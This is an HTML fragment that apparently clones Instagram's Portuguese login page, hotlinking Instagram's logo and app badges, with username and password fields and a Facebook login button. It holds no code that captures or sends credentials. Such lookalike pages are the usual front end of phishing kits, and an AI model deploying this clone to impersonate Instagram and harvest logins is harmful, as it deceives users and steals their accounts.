<div class="container">
  <div class="login-form">
      <i data-visualcompletion="css-img" aria-label="Instagram" class="" role="img" style="background-image: url(&quot;https://static.cdninstagram.com/rsrc.php/v3/yS/r/ajlEU-wEDyo.png&quot;); background-size: auto; width: 175px; height: 51px; display: inline-block; background-position: 0px -52px; background-repeat: no-repeat no-repeat;"></i>

      <div class="_ab32">
          <div class="x6s0dn4 ">
              <label class="_aa48">
                  <input placeholder="Número de telemóvel, nome de utilizador ou e-mail" aria-label="Número de telemóvel, nome de utilizador ou e-mail" aria-required="true" autocapitalize="off" autocorrect="off" maxlength="75" class="_aa4b _add6 _ac4d" dir="" type="text" value="" name="username">
              </label>
              <div class="">

              </div></div>
          </div>


      <input type="password" id="password" placeholder="Palavra-passe">



      <button class="button" disabled="" type="submit">
          <div class="">Iniciar Sessão</div>
      </button>

      <div class="or-area">
          <div class="left-"></div>
          <div class="or">OU</div>
          <div class="right-"></div>
      </div>


      <div class="face-case">
          <button class="_acan" type="button">
              <div class="fb-bg">
                  <span class=" fa fa-facebook-f face-icon "></span>
              </div>
              <span class="_ab37">Iniciar sessão com o Facebook</span>
          </button>
      </div>

      <a class="reset-pass" href="" role="link" tabindex="0">Esqueceu a senha?</a>

      <div class="_ab21"><span class="x1lliihq x1plvlek xryxfnj x1n2onr6 x193iq5w xeuugli x1fj9vlw x13faqbe x1vvkbs x1s928wv xhkezso x1gmr53x x1cpjm7i x1fgarty x1943h6x x1i0vuye xvs91rp xo1l8bm x1roi4f4 x1tu3fi x3x7a5m x10wh9bi x1wdrske x8viiok x18hxmgj" dir="auto" style="line-height: var(--base-line-clamp-line-height); --base-line-clamp-line-height: 18px;"><p class="_ab25">Não tem uma conta? <a class="x1i10hfl xjbqb8w x6umtig x1b1mbwd xaqea5y xav7gou x9f619 x1ypdohk xt0psk2 xe8uvvx xdj266r x11i5rnm xat24cr x1mh8g0r xexx8yu x4uap5 x18d9i69 xkhd6sd x16tdsg8 x1hl2dhg xggy1nq x1a2a7pz _a6hd" href="/accounts/emailsignup/" role="link" tabindex="0"><span class="_aacl _aaco _aacw _aad0 _aad7" dir="auto">Cadastrar-se.</span></a></p></span></div>


  </div>
  <span class="x1lliihq " style="margin: 10px 0;" dir="auto" style="line-height: var(--base-line-clamp-line-height); --base-line-clamp-line-height: 18px;">Obtém a aplicação.</span>
  <div class="app-case">
      <img alt="Descarregar na App Store" class="get-app" src="https://static.cdninstagram.com/rsrc.php/v3/yz/r/JPvB0zbMDLg.png">
      <img alt="Obter no Google Play" class="get-app" src="https://static.cdninstagram.com/rsrc.php/v3/yk/r/79GIv0tl5JK.png">
  </div>

</div>
